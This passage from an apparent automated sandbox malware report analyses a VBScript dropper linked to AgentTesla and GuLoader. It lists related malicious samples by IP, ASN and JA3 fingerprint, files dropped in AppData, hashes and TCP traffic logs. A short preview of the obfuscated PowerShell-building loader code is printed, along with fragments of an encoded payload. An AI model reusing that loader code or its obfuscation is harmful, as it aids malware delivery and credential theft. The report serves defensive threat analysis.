                                                      • 208.95.112.1
                                                      Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      • 208.95.112.1
                                                      mail.cash4cars.nzGesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      tems.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      20220830_ProtecoPTE.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Klkket.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      bg.microsoft.map.fastly.nethttp://rum.browser-intake-foxbusiness.com:443Get hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      SecuriteInfo.com.Win32.CrypterX-gen.1582.25294.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                      • 199.232.210.172
                                                      ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 199.232.210.172
                                                      6W9hpMEmjY.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      6W9hpMEmjY.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      cncUVRcGoI.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      https://www.longin-eki.co.jp.zurxyjp.cn/Get hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      https://xxnewmac5xx.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      https://windowdefalerts-error0x21916-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                      • 199.232.210.172

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      SERVERMULE-AS-APNimbus2PtyLtdAUGesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      tems.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      20220830_ProtecoPTE.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Klkket.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      TUT-ASUSRICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                      • 208.95.112.1
                                                      explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 208.95.112.1
                                                      X1.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 208.95.112.1
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                      • 208.95.112.1
                                                      Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      • 208.95.112.1

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0epurchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      X1.exeGet hashmaliciousXWormBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      37f463bf4616ecd445d4a1937da06e19#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      181_960.msiGet hashmaliciousUnknownBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132
                                                      768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 142.250.101.113
                                                      • 142.251.2.132

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Roaming\newfile\newfile.exeGesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Request for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                              Documentos adjuntos.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  FAR.N#U00ba2430-24000993.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        RFQ-16042024-2_2403872952 .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.886255615007755
                                                                          Encrypted:false
                                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:@...e................................. ..............@..........

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbn2mgjy.gfg.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjivrtsc.nu1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjzq1csg.qj4.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yngfprbw.spv.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Coleoptilum.Unw

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):435476
                                                                          Entropy (8bit):5.9667353614117955
                                                                          Encrypted:false
                                                                          SSDEEP:12288:IF/Nl8r9aEgkJz+6+BFEOkCjZ6EpJsrAl:IFb8r9HgkZRKZ6E/
                                                                          MD5:CED110AE799F108BA8DD3020A033596B
                                                                          SHA1:43D40C2EE9C3DA906E6A1FCD44992ED06685C637
                                                                          SHA-256:E374E8259A203F3C0610D2F18F59B9338F52A6514F635CDA5CCF7CA88243C08F
                                                                          SHA-512:225A95EBB985BBC313734097F0EAED503352CCBDB9F33894297E4FA8D76D159BED7FE4761DF87A004A178DAA12F9FC8BE16AF03F7D9FDCFBBF84FC18D9135F24
                                                                          Malicious:false
                                                                          Preview:cQGbcQGbu65HGQBxAZvrApiDA1wkBOsC9tZxAZu5eSE42usCwJrrAmBXgcHE0i7UcQGbcQGbgfE99GaucQGbcQGbcQGb6wLQtbpIV7OycQGbcQGb6wLIz3EBmzHKcQGb6wJGtYkUC3EBm+sCUavR4usCTgtxAZuDwQRxAZvrAmJMgfkS268CfMvrAuTA6wJQTItEJATrAsSm6wJJsInD6wJRO3EBm4HDTajKAOsC76jrAivOulC2mp5xAZvrAhGsgfLFFHkY6wLv2HEBm4HCa10ceXEBm+sC02RxAZvrAlqt6wJLYnEBm4sMEHEBm3EBm4kME+sCWxdxAZtCcQGb6wKs8IH69I0EAHXWcQGb6wLeXYlcJAxxAZvrAue3ge0AAwAAcQGb6wI0j4tUJAhxAZtxAZuLfCQEcQGb6wI0UYnr6wKqV+sCBTSBw5wAAABxAZvrAkULU+sCEzFxAZtqQHEBm3EBm4nrcQGbcQGbx4MAAQAAADDMAusCAl1xAZuBwwABAABxAZtxAZtTcQGbcQGbietxAZvrAm8kibsEAQAAcQGb6wLzLoHDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm+sC+N+DwgXrAsNV6wIrsTH26wIcMusCj14xyesCmVFxAZuLGnEBm+sCXBBB6wK6eOsCeGk5HAp18usCCrJxAZtGcQGbcQGbgHwK+7h13esCIBNxAZuLRAr8cQGbcQGbKfDrAuWd6wI1xv/S6wLT/OsCUUK69I0EAOsCvZXrAm5cMcBxAZvrAuori3wkDHEBm+sCLA2BNAfIHMwLcQGbcQGbg8AE6wLunOsCogw50HXkcQGbcQGbifvrAo9acQGb/9dxAZtxAZvxxkXuD5nR9DfjgeKe2k2O1eMz9FDmHCZJmdH0N+PsAxX1TabV4zP0zfXI1YTjQRY34zN+P0mqMguVKYszBHU8sfWkjzadPRI8Hgr9CZBJ2kntHyz1A0jBSe0poR6tSOau6w9+ntuI

                                                                          C:\Users\user\AppData\Roaming\newfile\newfile.exe

                                                                          Download File
                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):516608
                                                                          Entropy (8bit):6.035530871194082
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                          MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                          SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                          SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                          SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          Joe Sandbox View:
                                                                          • Filename: Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta, Detection: malicious, Browse
                                                                          • Filename: rPayment_AdviceJ001222042024.bat, Detection: malicious, Browse
                                                                          • Filename: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs, Detection: malicious, Browse
                                                                          • Filename: Request for Proposal Quote_2414976#U00b7pdf.vbs, Detection: malicious, Browse
                                                                          • Filename: Documentos adjuntos.vbe, Detection: malicious, Browse
                                                                          • Filename: 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe, Detection: malicious, Browse
                                                                          • Filename: FAR.N#U00ba2430-24000993.vbe, Detection: malicious, Browse
                                                                          • Filename: justificante.vbe, Detection: malicious, Browse
                                                                          • Filename: Transferencia 4334300002017359pdf.vbe, Detection: malicious, Browse
                                                                          • Filename: RFQ-16042024-2_2403872952 .pdf.vbs, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with very long lines (361), with CRLF line terminators
                                                                          Entropy (8bit):5.345832920092104
                                                                          TrID:
                                                                          • Visual Basic Script (13500/0) 100.00%
                                                                          File name:G4-TODOS.vbs
                                                                          File size:8'460 bytes
                                                                          MD5:0894754b81c21bfa79481c3940d134d5
                                                                          SHA1:381352cd7b6551606bfb8c07cd77d7c50ffe41cc
                                                                          SHA256:0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4
                                                                          SHA512:ea8fb60de2b0c6f67c2473963348a505fc031e8e361eae051d3a8efdd1a63984c5fe06c4b832a906c76a590c2346bdf19de39a5d5965d1961bee20e421c2f06b
                                                                          SSDEEP:192:jVNOLlEuLpGIxZX2ufM8Nft3fIlikQNJtuMsVU3UbyWzR6zaSLE2mM8ggQTGOKPd:pNOLlEbIxZX2uf9NVQlikQPtsekbyWzx
                                                                          TLSH:5D021A0B09955A3432A1B27FD99B8A05F734C4E9C8B2D6227D3F7F523510C49316EA6D
                                                                          File Content Preview:.. ..Function Befolkningsgruppes ......S6 = S6 & "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundam

                                                                          File Icon

                                                                          Icon Hash:68d69b8f86ab9a86

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 24, 2024 06:46:07.803226948 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:07.803261042 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:07.803325891 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:07.811986923 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:07.812011003 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.183104038 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.183198929 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.184226036 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.184299946 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.188952923 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.188966036 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.189363003 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.200573921 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.244122028 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.577020884 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.577090979 CEST44349706142.250.101.113192.168.2.9
                                                                          Apr 24, 2024 06:46:08.577115059 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.577155113 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.581286907 CEST49706443192.168.2.9142.250.101.113
                                                                          Apr 24, 2024 06:46:08.758562088 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:08.758621931 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:08.758799076 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:08.759130001 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:08.759147882 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:09.118138075 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:09.118221045 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:09.121002913 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:09.121033907 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:09.121325970 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:09.122246981 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:09.164120913 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.164186001 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.164271116 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.176131964 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.176218033 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.200576067 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.200647116 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.213021040 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.254360914 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.254383087 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.301275015 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.339282990 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.345279932 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.345346928 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.345376968 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.357542992 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.357611895 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.357618093 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.357634068 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.357670069 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.369762897 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.382117987 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.382169008 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.382186890 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.382221937 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.382503986 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.394304037 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.406666040 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.406758070 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.406790972 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.418994904 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.419060946 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.419071913 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.419101954 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.419188976 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.430182934 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.442137957 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.442209959 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.442213058 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.442233086 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.442291021 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.452606916 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.463680029 CEST44349707142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:10.463835001 CEST49707443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:10.463848114 CEST44349707142.251.2.132192.168.2.9
